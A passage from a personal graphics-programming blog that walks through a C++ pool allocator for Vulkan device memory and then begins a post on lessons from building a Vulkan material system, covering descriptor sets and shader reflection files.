<p>Linear buffer 0xXX is aliased with non-linear image 0xXX which may indicate a bug. For further info refer to the Buffer-Image Granularity section of the Vulkan specification. >(https://www.khronos.org/registry/vulkan/specs/1.0-extensions/xhtml/vkspec.html#resources-bufferimagegranularity)</p>
</blockquote>
<p>So I’m using this buffer-image granularity number as my page size for allocations, and only ever allocating large blocks which are a multiple of that size for simplicity.</p>
<p>Another thing to keep in mind is that different memory types can’t share the same VkDeviceMemory allocation, so we’ll need a memory pool for each memoryType returned for our GPU (on my card, this meant that I’d need up to 11 memory pools).</p>
<h2 id="the-pool-allocator">The Pool Allocator</h2>
<p>Finally, we get to the good stuff. The Pool Allocator is what I ended up with after cramming all of the above into my head. I’ve talked about it enough already, so let’s actually get to the code. To start off, I want to talk about the couple of structs that I’m using to track allocators, and allocator state data:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">OffsetSize</span> <span class="p">{</span> <span class="kt">uint64_t</span> <span class="n">offset</span><span class="p">;</span> <span class="kt">uint64_t</span> <span class="n">size</span><span class="p">;</span> <span class="p">};</span>
<span class="k">struct</span> <span class="n">BlockSpanIndexPair</span> <span class="p">{</span> <span class="kt">uint32_t</span> <span class="n">blockIdx</span><span class="p">;</span> <span class="kt">uint32_t</span> <span class="n">spanIdx</span><span class="p">;</span> <span class="p">};</span>
<span class="k">struct</span> <span class="n">DeviceMemoryBlock</span>
<span class="p">{</span>
<span class="n">Allocation</span> <span class="n">mem</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">OffsetSize</span><span class="o">></span> <span class="n">layout</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">MemoryPool</span>
<span class="p">{</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">DeviceMemoryBlock</span><span class="o">></span> <span class="n">blocks</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">AllocatorState</span>
<span class="p">{</span>
<span class="n">VkhContext</span><span class="o">*</span> <span class="n">context</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="kt">size_t</span><span class="o">></span> <span class="n">memTypeAllocSizes</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">totalAllocs</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">pageSize</span><span class="p">;</span>
<span class="n">VkDeviceSize</span> <span class="n">memoryBlockMinSize</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">MemoryPool</span><span class="o">></span> <span class="n">memPools</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>So yeah… that’s a lot of nested vectors, but it works and that’s good enough for me right now. I’m sure someone reading this has strong opinions about a better way to structure this and I’d actually really love to hear about it <a href="https://twitter.com/khalladay">on Twitter</a>, but for this article, I’m going with the above.</p>
<p>The first two structs at the beginning are really just more convenient std::pairs, I hate pairs because .first and .second get really hard to read really fast, these just give me more useful member names.</p>
<p>The AllocatorState structure is the real meat of the above snippet. For the most part it’s probably pretty explanatory, but the few variables that aren’t probably make more sense in the context of the activate function, which is less boring than the passthrough allocator:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">activate</span><span class="p">(</span><span class="n">VkhContext</span><span class="o">*</span> <span class="n">context</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">context</span><span class="o">-></span><span class="n">allocator</span> <span class="o">=</span> <span class="n">allocImpl</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">context</span> <span class="o">=</span> <span class="n">context</span><span class="p">;</span>
<span class="n">VkPhysicalDeviceMemoryProperties</span> <span class="n">memProperties</span><span class="p">;</span>
<span class="n">vkGetPhysicalDeviceMemoryProperties</span><span class="p">(</span><span class="n">context</span><span class="o">-></span><span class="n">gpu</span><span class="p">.</span><span class="n">device</span><span class="p">,</span> <span class="o">&</span><span class="n">memProperties</span><span class="p">);</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">.</span><span class="n">resize</span><span class="p">(</span><span class="n">memProperties</span><span class="p">.</span><span class="n">memoryTypeCount</span><span class="p">);</span>
<span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">.</span><span class="n">resize</span><span class="p">(</span><span class="n">memProperties</span><span class="p">.</span><span class="n">memoryTypeCount</span><span class="p">);</span>
<span class="n">state</span><span class="p">.</span><span class="n">pageSize</span> <span class="o">=</span> <span class="n">context</span><span class="o">-></span><span class="n">gpu</span><span class="p">.</span><span class="n">deviceProps</span><span class="p">.</span><span class="n">limits</span><span class="p">.</span><span class="n">bufferImageGranularity</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">memoryBlockMinSize</span> <span class="o">=</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span> <span class="o">*</span> <span class="mi">10</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I chose the minimum block size at random, and in practice that number is probably the most important one for making sure this allocator performs the best it can (ideally large enough that every large allocation will be able to be broken up by multiple requests). My app is so simple that I’m not worrying about using up all my graphics memory, so I probably could have made this 10x larger than it is, but that seemed like an even dumber idea than what I did.</p>
<p>The rest of that function pretty much documents itself, but without it, the allocate function would have made a lot less sense:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">alloc</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">outAlloc</span><span class="p">,</span> <span class="n">VkDeviceSize</span> <span class="n">size</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">memoryType</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">MemoryPool</span><span class="o">&</span> <span class="n">pool</span> <span class="o">=</span> <span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">[</span><span class="n">memoryType</span><span class="p">];</span>
<span class="c1">//make sure we always alloc a multiple of pageSize</span>
<span class="n">VkDeviceSize</span> <span class="n">requestedAllocSize</span> <span class="o">=</span> <span class="p">((</span><span class="n">size</span> <span class="o">/</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span><span class="p">;</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">memoryType</span><span class="p">]</span> <span class="o">+=</span> <span class="n">requestedAllocSize</span><span class="p">;</span>
<span class="n">BlockSpanIndexPair</span> <span class="n">location</span><span class="p">;</span>
<span class="n">bool</span> <span class="n">found</span> <span class="o">=</span> <span class="n">findFreeChunkForAllocation</span><span class="p">(</span><span class="n">location</span><span class="p">,</span> <span class="n">memoryType</span><span class="p">,</span> <span class="n">requestedAllocSize</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">found</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">location</span> <span class="o">=</span> <span class="p">{</span> <span class="n">addBlockToPool</span><span class="p">(</span><span class="n">requestedAllocSize</span><span class="p">,</span> <span class="n">memoryType</span><span class="p">),</span> <span class="mi">0</span> <span class="p">};</span>
<span class="p">}</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">handle</span> <span class="o">=</span> <span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">location</span><span class="p">.</span><span class="n">blockIdx</span><span class="p">].</span><span class="n">mem</span><span class="p">.</span><span class="n">handle</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">size</span> <span class="o">=</span> <span class="n">size</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">offset</span> <span class="o">=</span> <span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">location</span><span class="p">.</span><span class="n">blockIdx</span><span class="p">].</span><span class="n">layout</span><span class="p">[</span><span class="n">location</span><span class="p">.</span><span class="n">spanIdx</span><span class="p">].</span><span class="n">offset</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">type</span> <span class="o">=</span> <span class="n">memoryType</span><span class="p">;</span>
<span class="n">outAlloc</span><span class="p">.</span><span class="n">id</span> <span class="o">=</span> <span class="n">location</span><span class="p">.</span><span class="n">blockIdx</span><span class="p">;</span>
<span class="n">markChunkOfMemoryBlockUsed</span><span class="p">(</span><span class="n">memoryType</span><span class="p">,</span> <span class="n">location</span><span class="p">,</span> <span class="n">requestedAllocSize</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>The most important thing to note in this function is that no matter how big the allocation we need is, the allocator rounds it up to the nearest multiple of our page size and uses that. The only thing that needs the originally asked for allocation size is the structure we’re returning to the caller (since it needs the correct size for the bind function).</p>
<p>This function itself is pretty straightforward, as are the couple of functions I haven’t pasted here. findFreeChunkForAllocation returns a location inside our target MemoryPool that can fit the allocation we want to make. If it can’t find space, we have to make space by adding a new block to the pool (that function returns the new block’s index in the memory pool), which is what addBlockToPool does.</p>
<p>Finally, after we build our allocation structure, we have to update the usage data for the DeviceMemoryBlock we’re using to make sure we know what regions of memory are already in use.</p>
<p>The code for all of these functions is on <a href="https://github.com/khalladay/VkMaterialSystem/blob/material-instances/VkMaterialSystem/vkh_allocator_pool.cpp">the github repo</a>, (i’ve linked directly to the allocator’s .cpp file), so click through if you’re interested, I’m going to omit them here for brevity.</p>
<p>One function I’m not going to omit is the free function:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">free</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">allocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">VkDeviceSize</span> <span class="n">requestedAllocSize</span> <span class="o">=</span> <span class="p">((</span><span class="n">allocation</span><span class="p">.</span><span class="n">size</span> <span class="o">/</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">state</span><span class="p">.</span><span class="n">pageSize</span><span class="p">;</span>
<span class="n">OffsetSize</span> <span class="n">span</span> <span class="o">=</span> <span class="p">{</span><span class="n">allocation</span><span class="p">.</span><span class="n">offset</span><span class="p">,</span> <span class="n">requestedAllocSize</span> <span class="p">};</span>
<span class="n">MemoryPool</span><span class="o">&</span> <span class="n">pool</span> <span class="o">=</span> <span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">];</span>
<span class="n">bool</span> <span class="n">found</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">j</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">j</span> <span class="o"><</span> <span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">.</span><span class="n">size</span><span class="p">();</span> <span class="o">++</span><span class="n">j</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">[</span><span class="n">j</span><span class="p">].</span><span class="n">offset</span> <span class="o">==</span> <span class="n">requestedAllocSize</span> <span class="o">+</span><span class="n">allocation</span><span class="p">.</span><span class="n">offset</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">[</span><span class="n">j</span><span class="p">].</span><span class="n">offset</span> <span class="o">=</span> <span class="n">allocation</span><span class="p">.</span><span class="n">offset</span><span class="p">;</span>
<span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">[</span><span class="n">j</span><span class="p">].</span><span class="n">size</span> <span class="o">+=</span> <span class="n">requestedAllocSize</span><span class="p">;</span>
<span class="n">found</span> <span class="o">=</span> <span class="nb">true</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">found</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">].</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">layout</span><span class="p">.</span><span class="n">push_back</span><span class="p">(</span><span class="n">span</span><span class="p">);</span>
<span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">]</span> <span class="o">-=</span> <span class="n">requestedAllocSize</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Remember that the Allocation struct needed to have the non rounded-up size so it could bind properly, so the first thing we need to do is get the size of the memory chunk it will take up in one of our pools. After that, it’s just a matter of updating the usage data for the pool the allocation was from (which I store in the id variable of the struct). The logic I’m using to update the layout for the blocks is really simple, and is almost certainly unoptimal in a lot of scenarios, but it works for now and is short enough to paste into a blog post, so I’m going to go with it.</p>
<p>Also important to note: I’m not actually ever freeing memory right now, just reusing pages. In a big kid app, I’d probably need to change that.</p>
<p>The remaining parts of the AllocatorInterface that the pool allocator implements are as follows:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">size_t</span> <span class="nf">allocatedSize</span><span class="p">(</span><span class="kt">uint32_t</span> <span class="n">memoryType</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">state</span><span class="p">.</span><span class="n">memTypeAllocSizes</span><span class="p">[</span><span class="n">memoryType</span><span class="p">];</span>
<span class="p">}</span>
<span class="kt">uint32_t</span> <span class="nf">numAllocs</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">state</span><span class="p">.</span><span class="n">totalAllocs</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>I’m going to go out on a limb and assume these don’t need explanation.</p>
<p>Putting all of this together and re running the MaterialDemo app shows that now I’m only using 4 active allocations to render the frame! That’s a big improvement over the 11 that I needed earlier. Mission success! Mostly…</p>
<h2 id="the-problem-of-mapping-memory">The Problem Of Mapping Memory</h2>
<p>Unfortunately, using the above code, I ended up with the following in my output log:</p>
<blockquote>
<p>VkMapMemory: Attempting to map memory on an already-mapped object 0x1a</p>
</blockquote>
<p>It appears to be incorrect to map the same vkDeviceMemory block more than once at the same time, even if you’re mapping different regions of the block of memory. This means that the pool allocator needs a bit more information about how we plan to use the memory that we get out of it, to decide whether it needs to put that allocation into it’s own chunk of memory, or if it can reuse an old one like I did above.</p>
<p>Any allocation that isn’t device local <em>might</em> be mapped at some point, so I decided to simply assume that if an allocation’s memory properties weren’t exactly VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT, I would give it its own allocation. Since the usage flags aren’t part of a standard VkMemoryAllocateInfo, this meant I had to define my own AllocateCreateInfo struct, and modify my AllocatorInterface a bit:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">AllocationCreateInfo</span>
<span class="p">{</span>
<span class="n">VkMemoryPropertyFlags</span> <span class="n">usage</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">memoryTypeIndex</span><span class="p">;</span>
<span class="n">VkDeviceSize</span> <span class="n">size</span><span class="p">;</span>
<span class="p">};</span>
<span class="k">struct</span> <span class="n">AllocatorInterface</span>
<span class="p">{</span>
<span class="c1">//this was the only function that changed</span>
<span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">alloc</span><span class="p">)(</span><span class="n">Allocation</span><span class="o">&</span><span class="p">,</span> <span class="n">AllocationCreateInfo</span><span class="p">);</span>
<span class="p">};</span></code></pre></figure>
<p>This is probably better long term anyway, because at some point it will likely be handy to be able to pass even more data about how the allocation will be used to the alloc function, and now I have the place to do that.</p>
<p>The changes to the allocator itself are very minimal. First, I added a flag to the DeviceMemoryBlock struct to flag it as “reserved,” that is, not eligible for new allocations even if there is room:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">struct</span> <span class="n">DeviceMemoryBlock</span>
<span class="p">{</span>
<span class="n">Allocation</span> <span class="n">mem</span><span class="p">;</span>
<span class="n">std</span><span class="o">::</span><span class="n">vector</span><span class="o"><</span><span class="n">OffsetSize</span><span class="o">></span> <span class="n">layout</span><span class="p">;</span>
<span class="n">bool</span> <span class="n">pageReserved</span><span class="p">;</span>
<span class="p">};</span></code></pre></figure>
<p>Next, the allocation function needed to be modified to check if an allocation needed a whole page to itself, and to pass that info to the findFreeChunkForAllocation function. This flag forced the find function to return a totally DeviceMemoryBlock that will fit the allocation.</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">alloc</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">outAlloc</span><span class="p">,</span> <span class="n">AllocationCreateInfo</span> <span class="n">createInfo</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//rest of code omitted for brevity</span>
<span class="n">bool</span> <span class="n">needsOwnPage</span> <span class="o">=</span> <span class="n">createInfo</span><span class="p">.</span><span class="n">usage</span> <span class="o">!=</span> <span class="n">VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT</span><span class="p">;</span>
<span class="n">bool</span> <span class="n">found</span> <span class="o">=</span> <span class="n">findFreeChunkForAllocation</span><span class="p">(</span><span class="n">location</span><span class="p">,</span> <span class="n">memoryType</span><span class="p">,</span> <span class="n">requestedAllocSize</span><span class="p">,</span> <span class="n">needsOwnPage</span><span class="p">);</span>
<span class="c1">//...</span>
<span class="p">}</span></code></pre></figure>
<p>The after either finding or creating a memory block to use, the allocation function marks that DeviceMemoryBlock as reserved:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">location</span><span class="p">.</span><span class="n">blockIdx</span><span class="p">].</span><span class="n">pageReserved</span> <span class="o">=</span> <span class="n">needsOwnPage</span><span class="p">;</span></code></pre></figure>
<p>Finally, the free function had to be modified to mark any DeviceMemoryBlock that it’s freeing memory from as not reserved:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">free</span><span class="p">(</span><span class="n">Allocation</span><span class="o">&</span> <span class="n">allocation</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//rest of code omitted for brevity</span>
<span class="n">MemoryPool</span><span class="o">&</span> <span class="n">pool</span> <span class="o">=</span> <span class="n">state</span><span class="p">.</span><span class="n">memPools</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">type</span><span class="p">];</span>
<span class="n">pool</span><span class="p">.</span><span class="n">blocks</span><span class="p">[</span><span class="n">allocation</span><span class="p">.</span><span class="n">id</span><span class="p">].</span><span class="n">pageReserved</span> <span class="o">=</span> <span class="nb">false</span><span class="p">;</span>
<span class="c1">//...</span>
<span class="p">}</span></code></pre></figure>
<p>With all that in place, I ran the MaterialDemo again, and at long last, got the thing to run with no errors, and only 4 allocations, which means I’m calling work on this done for now.</p>
<h2 id="wrap-up">Wrap Up</h2>
<p>I’m really glad that I decided to dig into this rather than just grab GPUOpen’s allocator. I learned a ton about Vulkan memory that I’m quite positive I never would have learned otherwise. As mentioned many times, all the code for this is available <a href="https://github.com/khalladay/VkMaterialSystem/tree/material-instances">on github</a></p>
<p>As per usual, I’m sure I’m doing a hundred different dumb things in this article, and I’d love you to send me a message <a href="https://twitter.com/khalladay">on Twitter</a>, or @Khalladay on <a href="gamedev.mastodon.place">Mastodon</a> if you spot on of them (or want to say hi).</p>
<p>Tune in next time when I try to finally add instances to the material system!</p>
Lessons Learned While Building a Vulkan Material System2017-11-27T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2017/11/27/Vulkan-Material-System<p>One of the things I’m noticing about learning Vulkan, is that there isn’t a lot of material out there to bridge the gap between being a complete beginner, and being able to build your own real applications.</p>
<p>I didn’t realize how big this gap was was until I decided to start my next Vulkan project by building a material system. It was supposed to just be the first step in something bigger, but I realized pretty quickly that I didn’t know nearly enough to even get this small piece done. So I scrapped my loftier plans, and decided to split building the material system up into two parts. The first phase (which is the part I have done) was to simply load materials from a file which specified which shaders to use, and which default values to use for their inputs. To keep things simple, I’ve so far always been loading the material onto a full screen quad.</p>
<p>The second phase will be to extend the system to handle material instances, and thousands of objects, but before I dive into that, it felt like a good time to take a step back and write down some of the things I’ve had to figure out to get this far, in case someone else gets stuck in the same places.</p>
<div align="center">
<img src="/images/post_images/2017-11-28/output.png" />
<font size="2">One of my tests was Inigo Quilez's <a href="https://www.shadertoy.com/view/Xds3zN">raymarching primitives shader</a></font>
<br /><br />
</div>
<p>This post is going to jump around a little bit, as you’ll notice by the headings. Some things I want to share are just things I didn’t realize about how to use the Vulkan API, some are “good ideas” that are working out for me so far, and finally I want to write a bit about the high level structure of how my material system works.</p>
<p>All the code for everything is <a href="https://github.com/khalladay/VkMaterialSystem">on github</a>, and I’ve tried to add helpful comments to <a href="https://github.com/khalladay/VkMaterialSystem/blob/master/VkMaterialSystem/material_creation.cpp">material_creation.cpp</a>, which contains most of the stuff I’m talking about here. Standard caveats to everything: I barely know what I’m doing, there’s probably better ways to do this, I’m not a lawyer, yadda yadda yadda.</p>
<h2 id="how-descriptor-sets-and-bindings-work">How Descriptor Sets (and Bindings!) Work</h2>
<p>The first thing that I really needed to get a handle on was how descriptor sets work in Vulkan GLSL. It’s easy enough to look at the syntax and realize that they’re a method for grouping shader inputs and move on, but there’s a bit more to them than that.</p>
<p>For one, Vulkan shaders aren’t namespaced, so Descriptor Set 0 in your vertex shader, is Descriptor Set 0 in your fragment shader (or any other stage you’re using in your material). This also means that a single descriptor set can have bindings that exist in different shader stages, but still all belong to the same set. Even more fun, since the SPIR-V compiler will (likely) remove any variables not in use by your shader, your shader stages may all have the same Descriptor Set Binding in them, and see different versions of that binding.</p>
<p>Let me show you what I mean. If you have a vertex shader that uses descriptor set 0, binding 0, to hold some global information:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="n">layout</span><span class="p">(</span><span class="n">binding</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span> <span class="n">set</span> <span class="o">=</span> <span class="mi">0</span><span class="p">)</span><span class="n">uniform</span> <span class="n">GLOBAL_DATA</span>
<span class="p">{</span>
<span class="kt">float</span> <span class="n">time</span><span class="p">;</span>
<span class="n">vec2</span> <span class="n">mouse</span><span class="p">;</span>
<span class="p">}</span><span class="n">global</span><span class="p">;</span></code></pre></figure>
<p>But your actual shader code only ever uses the time member of the GLOBAL_DATA uniform, the compiler will optimize away the mouse member var entirely. However, your fragment shader might also need access to global data, and if it uses the mouse data, and not the time data, it won’t even know that set 0, binding 0 has the time member in it.</p>
<p>To keep everyone on same page despite this, data about the size of the overall uniform is still there (that is, the size of the struct with ALL members, including compiled out ones, present), along with information about the offset into the struct that a member sits at. So your fragment shader, which only knows about mouse data, will still know that the GLOBAL_DATA uniform is 32 bytes large, and the mouse data is offset 16 bytes from the start of the uniform buffer. With this information, it doesn’t matter which member vars each stage sees.</p>
<p>Note that uniform members are 16 byte aligned in Vulkan, more on that later.</p>
<h2 id="use-descriptor-sets-to-group-inputs-by-update-frequency">Use Descriptor Sets To Group Inputs By Update Frequency</h2>
<p>You can’t bind an individual set binding in a command buffer, you have to bind an entire descriptor set at once, and binding a descriptor set is a performance heavy operation. What you should do (at least according to <a href="https://developer.nvidia.com/vulkan-shader-resource-binding">NVidia’s Article</a>), is use your descriptor sets to group shader inputs by how frequently they need to be swapped out. Once a descriptor set is bound, it stays bound for the duration of that command buffer, until something else gets bound to that set index. So if everything uses the same set 0, you can bind it once and never pay the cost to bind that again (until next frame).</p>
<p>In my project, I chose set 0 to store Global data which all shaders can access, which will get bound at the beginning of a frame and stay bound while rendering everything, left set 1 alone for a future experiment, and used sets 2 and 3 for data which can change on a per material / per material instance basis. Set 2 is for data which will get set when a material or instance is first loaded and then never changed (like the albedo texture of a character), while set 3 is for shader inputs that can be manipulated at runtime.</p>
<p>An example of how this might play out:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="k">for</span> <span class="n">each</span> <span class="n">view</span> <span class="p">{</span>
<span class="n">bind</span> <span class="n">global</span> <span class="n">resourcees</span> <span class="c1">// set 0</span>
<span class="k">for</span> <span class="n">each</span> <span class="n">shader</span> <span class="p">{</span>
<span class="n">bind</span> <span class="n">shader</span> <span class="n">pipeline</span>
<span class="k">for</span> <span class="n">each</span> <span class="n">material</span> <span class="p">{</span>
<span class="n">bind</span> <span class="n">material</span> <span class="n">resources</span> <span class="c1">// sets 2,3</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Obviously this is a pretty simple rendering model, but it’s good enough for this stage of my material system’s life.</p>
<p>Technically speaking, sets 2 and 3 could be one set, but having a separation between static and dynamic data made sense to me, since I have to keep around a lot more information about the dynamic data to facilitate updating it later, but time will tell if this is a good idea or not. I think it largely depends on if theres a higher cost associated with binding multiple descriptor sets in one call to vkCmdBindDescriptorSets.</p>
<h2 id="vkdescriptorpools-can-store-descriptors-of-different-types">VkDescriptorPools Can Store Descriptors of Different Types</h2>
<p>This is pretty obvious if you’re reading the actual API docs, but when I started this, most of my information was coming from tutorials like <a href="https://vulkan-tutorial.com/">vulkan-tutorial.com</a>, which never explicitly points out that your descriptor pools don’t have to be segregated by descriptor type. You can store uniform buffers, combined image samplers, dynamic buffers, the whole shebang in the same pool.</p>
<h2 id="getting-arbitrary-descriptor-set-layouts">Getting Arbitrary Descriptor Set Layouts</h2>
<p>The last three points were more about general Vulkan knowledge, but the rest are all about implementation details.</p>
<p>The most obvious problem with building a generic material loading system in Vulkan vs OpenGL is the lack of shader reflection available at runtime. In OpenGL all this functionality was there by default, but in Vulkan we need to use the wonderful <a href="https://github.com/KhronosGroup/SPIRV-Cross">SPIR-V Cross</a> library to help us get at this information.</p>
<p>I didn’t want to embed SPIR-V Cross in my runtime application, since it felt like unnecessary bloat, so I wrote a separate application that I called the “ShaderPipeline” (also available <a href="https://github.com/khalladay/VkMaterialSystem/tree/master/ShaderPipeline">on github</a>). This program runs whenever a shader has been edited, and handles compiling GLSL into SPIR-V, and creating json files (.refl files) that store reflection information about these shaders.</p>
<p>One of these .refl files might look like the following:</p>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="p">{</span>
<span class="s">"descriptor_sets"</span><span class="o">:</span> <span class="p">[</span>
<span class="p">{</span>
<span class="s">"set"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"binding"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"GLOBAL_DATA"</span><span class="p">,</span>
<span class="s">"size"</span><span class="o">:</span> <span class="mi">32</span><span class="p">,</span>
<span class="s">"type"</span><span class="o">:</span> <span class="s">"UNIFORM"</span><span class="p">,</span>
<span class="s">"members"</span><span class="o">:</span> <span class="p">[</span>
<span class="p">{</span>
<span class="s">"name"</span><span class="o">:</span> <span class="s">"mouse"</span><span class="p">,</span>
<span class="s">"size"</span><span class="o">:</span> <span class="mi">16</span><span class="p">,</span>
<span class="s">"offset"</span><span class="o">:</span> <span class="mi">16</span>
<span class="p">}</span>
<span class="p">]</span>
<span class="p">}</span>
<span class="p">],</span>
<span class="s">"global_sets"</span><span class="o">:</span> <span class="p">[</span>
<span class="mi">0</span>
<span class="p">],</span>
<span class="s">"static_sets"</span><span class="o">:</span> <span class="p">[],</span>
<span class="s">"dynamic_sets"</span><span class="o">:</span> <span class="p">[],</span>
<span class="s">"static_set_size"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"dynamic_set_size"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"num_static_uniforms"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"num_static_textures"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"num_dynamic_uniforms"</span><span class="o">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="s">"num_dynamic_textures"</span><span class="o">:</span> <span class="mi">0</span>
<span class="p">}</span></code></pre></figure>
<p>You’ll notice that at the end I have some extra data about which descriptor sets are global, dynamic, or static, and how many of each type we have. This information is obviously not technically necessary, but this way I can decide to change which sets belong to which category at the ShaderPipeline level instead of the runtime application, and having the counts available was just handier than counting them later.</p>
<h2 id="fill-gaps-in-your-vkdescriptorsetlayout-array-with-empty-elements">Fill Gaps In Your VkDescriptorSetLayout Array With Empty Elements</h2>
<p>This one definitely threw me for awhile until I figured out what to do, since it’s not something that I saw in any tutorial or example code before trying this project out.</p>
